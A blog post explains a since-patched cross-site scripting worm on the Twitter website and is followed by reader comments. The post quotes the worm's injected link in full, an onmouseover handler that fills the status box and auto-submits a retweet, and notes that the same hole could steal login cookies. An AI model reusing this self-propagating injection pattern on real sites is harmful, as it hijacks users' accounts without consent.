Another Day, Another Twitter Exploit
Apologies to anyone out there who’s not a Twitter fan (e.g. our very own Carps springs to mind), but this is another Twitter exploit post. If you do use Twitter you’ll likely already have seen this one in action today, and if you don’t, you won’t be interested. Oh well.
The Problem
The actual exploit as I first saw it is quite simple. All it’s based on is sending out a tweet starting with http://t.co/@ and continuing with whatever HTML you want to inject into the page. t.co is Twitter’s homegrown URL shortener, and I would guess that something in their escaping logic is trusting it more than it should. Certainly the http://a.bc/@ I tried didn’t work.
The Worm
Somebody – perhaps not the person who originally discovered the issue – used it to inject a bit of code into their Twitter feed:
<a href=”http://t.co/@”onmouseover=”document.getElementById(‘status’).value=’RT jamslater’;$(‘.status-update-form’).submit();”class=”modal-overlay”/” rel=”nofollow” target=”_blank”>http://t.co/@”onmouseover=”document.getElementById(‘status’).value=’RT jamslater’;$(‘.status-update-form’).submit();”class=”modal-overlay”/</a>
Name changed to protect the guilty.
Neat. In a nutshell, if you hover your mouse cursor over the t.co link (“onmouseover”) the JavaScript code is executed. All that does in this case is fills in your status at the top of the screen (the “What’s happening?” box) with “RT jamslater” and virtually clicks the Tweet button for you. No, I didn’t know you could retweet someone by doing that, either.
That’s how it’s spreading so fast and how every other tweet you see at the moment probably mentions it. By hovering over an affected tweet you’ll likely have retweeted it to your followers, perpetuating the cycle. This is fairly similar to the Samy worm that hit MySpace (remember them?) a few years ago.
It Could Be Worse
The code I found and examined above is fairly innocuous, if annoying. However, it isn’t limited to just sending retweets, it can essentially do anything that the Twitter website can. Send DMs, follow or unfollow people, send your login cookie off to somewhere nefarious, etc. It probably can’t change your password (you have to confirm your old one for that, thankfully) but my advice for the moment is definitely to sign out of twitter.com if you’re already on it. If not, leave and don’t come back until this issue is fixed.
External Twitter clients should be fine, unless they happen to suffer from the exact same bug. I’ve not heard of any issues outside of twitter.com.
tl;dr – Stay off the Twitter website for today. You’ve probably got work to do anyway.
Quick update: Twitter have patched it. They are “rolling out an update” at the moment.
Final update: The exploit has been patched. Panic over. Amusingly, an open source repository of Twitter related code, controlled by a Twitter employee, has a fix in it for this exact issue dated August 23rd. Very odd that the same fix wasn’t commited to their website, especially given the public nature of the above code. It seems that they might very well have brought this on themselves.
11 Comments
mark rushworth - http://www.markrushworth.com
Its an interesting exploit John here at Blueclaw spent many a happy minute taking it appart and making it do strange things (before having his account blocked)… you live and learn
Olly - http://www.dijitulseo.co.uk
It spun me out at first..
I initially thought a twitter client had broken and everyone using it’s tweets were screwed up..
Then realised it was doing stuff!
Its VERY simple… But its VERY clever!!
Not affecting tweetdeck PC and android, echofon or any of the other top clients – just the website!
#twitterfail
erica
there is something similar on facebook at the moment, you see a friend of yours has become a fan of X page, so you click on that and you land on the very website (which would be earnmoneywhatever.com) and you also automatically “Like” that page…no need to say there is no “Unlike” button.
You have to go to your Info page, then you have to go to “Edit Like” (or something like thta) and click on “Remove”.
It took me about 10 minutes to figure it out and I was quite annoyed!!!
Twitter Hacked – Google Next? | Driven Media Group - pingback
[…] Twitter site was hacked yet all 3rd party apps were protected due to the API. How did it happen? Over at David Naylor they break down just how twitter…well, […]
Sean Hardaker - http://www.seanhardaker.co.uk/
one has to be very careful when operating their work/business account with all these various exploits. It may not be your fault when your account starts linking off to pills, porn or gambling sites but try telling your not so savvy ‘middle class’ followers.
these exploits are a PR nightmare and sites like Twitter need to get their act together. They’ve got a responsibility to create a safe environment for the public and business on their site.
Imagine if when i went shopping the shopping centre just let pick pockets and thieves roam free. Would we still shop there?
TallTroll
Of course the main problem is that Twitter (like most other social media properties) isn’t very social. Or it is, but in the sense that the common room of your average psych institute is social, lots of lobotomies shouting at each other, and thinking that counts as “interaction”. This is just the equivalent of one of the inmates learning how to fake taking their meds. Wait until one of them learns how to tunnel out, you know what I’m saying.
chuck - http://www.cranialborborygmus.com
Ah ha,
My last-century-luddite-inspired inclination (or excuse) to put off joining Twitter had vindicated! I knew it was too dangerous! Now I can put off Twitter for at least another year!
Chuck, the luddite
Christopher West - http://www.seobychristopherwest.com
wow
another one… will they ever end.
my tiwtter account @westcp (I think) was blocked
my second one @SEO_Wizzards is also seems to be blocked (says pw is incorrect and I cannot recover it) but yet I can access it via Tweetdeck
Dan - http://www.keywordshack.com
I’m just wondering whether we’re going to have to deal with similar exploits when the new Twitter kicks in :\
Roger Bert
There are always teething problems with new releases. Need to be on guard all the time now.
sven @ büroaufzeit - http://bueroaufzeit.net
In my opinion this is happening way too much in the last time. Im not sure if I should still trust twitter…